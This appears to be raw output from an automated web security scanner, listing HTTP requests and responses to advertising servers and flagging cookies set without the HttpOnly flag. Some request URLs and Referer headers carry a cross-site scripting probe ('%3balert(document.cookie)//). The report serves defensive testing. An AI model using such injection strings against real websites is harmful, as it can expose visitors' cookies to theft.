GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20¢er=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 HTTP/1.1 Host: ad.afy11.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache, must-revalidate Server: AdifyServer Content-Type: text/html; charset=utf-8 Content-Length: 1767 Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net; P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3a9d/17/19e/*/x;234178444;1-0;0;58087481;3454-728/90;40401349/40419136/1;;~sscs=?http:/a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true Set-Cookie: id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 28 Jan 2011 16:41:38 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=300x250;pc=[TPAS_ID];ord=1114886567?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.vw.com Set-Cookie: id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 28 Jan 2011 16:40:24 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/N6103.135388.BIZO/B5185769.6;sz=728x90;ord=7630304?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.supercutsfranchise.com Set-Cookie: id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 28 Jan 2011 16:40:37 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAoOxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm?fpid=6 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15001%7C15001%7C15001%7C15001%7C15001%7C15002%7C15002%7C14983%7C15002; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 14:48:47 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 28 Jan 2011 14:48:47 GMT Content-Length: 335
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click?clid=e5656a6&rand=1296224076876&sid= HTTP/1.1 Host: ads.roiserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT SAdBuild: 400 P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml" Set-Cookie: sadscpax=e5656a6-; Domain=ads.roiserver.com; Expires=Sat, 29-Jan-2011 17:08:00 GMT; Path=/ Location: http://clkrd.com/ad.php?o=acai Content-Length: 0 Date: Fri, 28 Jan 2011 16:44:00 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ag.asp?cc=QAN007.310005.0&source=js&ord=5596043 HTTP/1.1 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 1042 Content-Type: text/javascript Expires: Fri, 28 Jan 2011 23:44:09 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSQAN007310005=uid=14877790; expires=Sat, 29-Jan-2011 23:45:08 GMT; path=/ Set-Cookie: FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1; expires=Mon, 28-Feb-2011 23:45:08 GMT; path=/ P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Fri, 28 Jan 2011 23:45:09 GMT Connection: close
if (typeof(fd_clk)=='undefined'){var fd_clk = 'http://ADSFAC.US/link.asp?cc=QAN007.310005.0&CreativeID=30281';}if(fd_clk.toLowerCase().indexOf('&creativeid=')!=-1){}else{fd_clk += '&CreativeID=30281'} ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /link.asp?cc=QAN007.310005.0&CreativeID=30281 HTTP/1.1 Host: adsfac.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: FSQAN007310005=uid=14877790; FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1;
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 276 Content-Type: text/html Expires: Sat, 29 Jan 2011 05:19:26 GMT Location: http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&utm_source=QFOnineAds&utm_content=&utm_term=sydney Server: Microsoft-IIS/7.0 Set-Cookie: FSQAN007=pctl=310005&FM30281=1&pdc=4045&pctc=30281&FQ=1&pctcrt=1&pctm=1&FL310005=1&fpt=0%2C310005%2C&pct%5Fdate=4045; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/ P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sat, 29 Jan 2011 05:20:26 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&u ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /link.asp HTTP/1.1 Host: adsfac.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: FSQAN007310005=uid=14877790; FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1;
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 152 Content-Type: text/html Expires: Sat, 29 Jan 2011 05:19:26 GMT Location: http://www.facilitatedigital.us Server: Microsoft-IIS/7.0 Set-Cookie: FS=fpt=0%2C0%2C&pctcrt=1&pctm=1&pctl=0&FM1=1&pdc=4045&pctc=1&FL0=1&FQ=1; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/ P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sat, 29 Jan 2011 05:20:26 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://www.facilitatedigital.us">here</a>.</body>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d791689/21/39823749/decide.php?ord=1296226106 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:48:41 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b203.dl Set-Cookie: CS1=deleted; expires=Thu, 28 Jan 2010 14:48:40 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; expires=Tue, 20 Mar 2012 06:48:41 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; expires=Tue, 20-Mar-2012 06:48:41 GMT; path=/; domain=.questionmarket.com; Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296224089.327,wait-%3E10000,&1296224142212 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_G=method->-1,ts->1296224088; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 14:14:50 GMT Content-Type: image/gif Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com; Content-length: 42 P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent
The following cookie was issued by the application and does not have the HttpOnly flag set:
ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bmx3/broker.pli?pid=p45555483&PRAd=59007464&AR_C=38601779 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; 